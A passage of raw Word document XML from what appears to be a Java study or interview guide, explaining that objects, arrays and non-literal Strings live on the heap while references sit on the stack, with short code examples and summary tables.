      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F15454F" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028655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AF4DD3F">
          <v:rect id="_x0000_i1277" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E10E1C1" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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ere are objects stored?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1A546" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655A">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Heap Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — All objects created using new keyword (or implicitly via boxing, collections, etc.) are stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721E2127" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028655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D8AD6C">
          <v:rect id="_x0000_i1278" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EAD440" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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33DD5120" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7E031A" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1949EB6B" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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3D91BB9" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B09565B" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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3042CC35" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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0DA0DD81" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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ar c = new Car(); // Object stored in heap, reference 'c' stored in stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E65F1" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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379C4B7" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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17C6531" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ar object is created in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C42D1EE" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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reference c (which points to the object) is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in the method's stack frame).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7C7C18" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028655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9820BE2">
          <v:rect id="_x0000_i1279" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B15605" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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Quick Breakdow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34"/>
        <w:gridCol w:w="5269"/>
      </w:tblGrid>
      <w:tr w:rsidR="0028655A" w:rsidRPr="00CE4B95" w14:paraId="041BEEB4" w14:textId="77777777" w:rsidTr="0055738D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="023DEB97" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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Memory Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C83B74E" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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ores</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028655A" w:rsidRPr="00CE4B95" w14:paraId="0FDE7D16" w14:textId="77777777" w:rsidTr="0055738D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA11ED2" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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ck</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4628374E" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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ethod-local variables, references to objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028655A" w:rsidRPr="00CE4B95" w14:paraId="79762794" w14:textId="77777777" w:rsidTr="0055738D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65716EFC" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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eap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BBBAA04" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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l objects, instance variables, arrays, Strings (non-literals)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028655A" w:rsidRPr="00CE4B95" w14:paraId="246568D5" w14:textId="77777777" w:rsidTr="0055738D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44D94796" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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 Area (MetaSpace in Java 8+)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E9C11D8" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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level data, static variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6173734B" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028655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D0EBC7C">
          <v:rect id="_x0000_i1280" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="251ADBC4" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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pecial Case: String Literals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126DA7AD" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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 s = "Hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C6578A" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ello" is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is part of the heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B190BBF" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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 is a reference in the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B7B9C3" w14:textId="55319F36" w:rsidR="00051BE0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00051BE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4EDB7C05">
          <v:rect id="_x0000_i1281" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2AAE32" w14:textId="59EA39A4" w:rsidR="00022CC0" w:rsidRPr="00CE4B95" w:rsidRDefault="00022CC0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc196307581"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidR="00C642E9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>eap memory in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="5512327D" w14:textId="1D12C66C" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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at is Heap Memory in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3627C2C6" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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eap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is the portion of memory used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic memory allocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, where all </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java objects</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class instance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arrays</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are stored during runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67E5D8" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0088088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4AA4C59">
          <v:rect id="_x0000_i1282" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E966FC" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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Points about Heap Memo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13"/>
        <w:gridCol w:w="6579"/>
      </w:tblGrid>
      <w:tr w:rsidR="0088088A" w:rsidRPr="00CE4B95" w14:paraId="38E14BDC" w14:textId="77777777" w:rsidTr="00E10FE8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F20B162" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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1441BC4B" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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88088A" w:rsidRPr="00CE4B95" w14:paraId="3CB63C2C" w14:textId="77777777" w:rsidTr="00E10FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3627FCC2" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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d For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37185D0B" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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oring all objects and their instance variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088088A" w:rsidRPr="00CE4B95" w14:paraId="51A4E583" w14:textId="77777777" w:rsidTr="00E10FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="362F4145" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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fetime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DE7D360" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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bjects live in heap as long as they are reachable (not garbage collected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088088A" w:rsidRPr="00CE4B95" w14:paraId="53492B0A" w14:textId="77777777" w:rsidTr="00E10FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E05B20D" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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hared</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B8C5FEE" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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ap is shared among all threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088088A" w:rsidRPr="00CE4B95" w14:paraId="49F6F8D3" w14:textId="77777777" w:rsidTr="00E10FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="390508F5" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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anaged By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11356F2E" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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 Virtual Machine (JVM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088088A" w:rsidRPr="00CE4B95" w14:paraId="208E5872" w14:textId="77777777" w:rsidTr="00E10FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22B48A93" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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GC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0334EDAB" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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arbage Collector automatically cleans up unreachable objects in heap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FE3BE0C" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0088088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43FCB93">
          <v:rect id="_x0000_i1283" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFE986B" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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at goes into the Heap?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782A1457" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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bjects created using new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B34C9" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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rays (int[], String[], etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2304BB25" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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instances (Student s = new Student();)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C2FCC" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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s not in the string constant pool (e.g., new String("abc"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28124A50" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0088088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7186B1">
          <v:rect id="_x0000_i1284" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B9ACCD" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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4E270C7A" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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Demo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1677F1" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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3804274D" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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name = new String("Java"); // stored in heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12648B25" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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arr = new int[10];          // array also stored in heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363AB992" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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5EDF98C" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088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58B2BBB" w14:textId="77777777" w:rsidR="00E10FE8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E10FE8" w:rsidP="0088088A">
      <w:pPr>
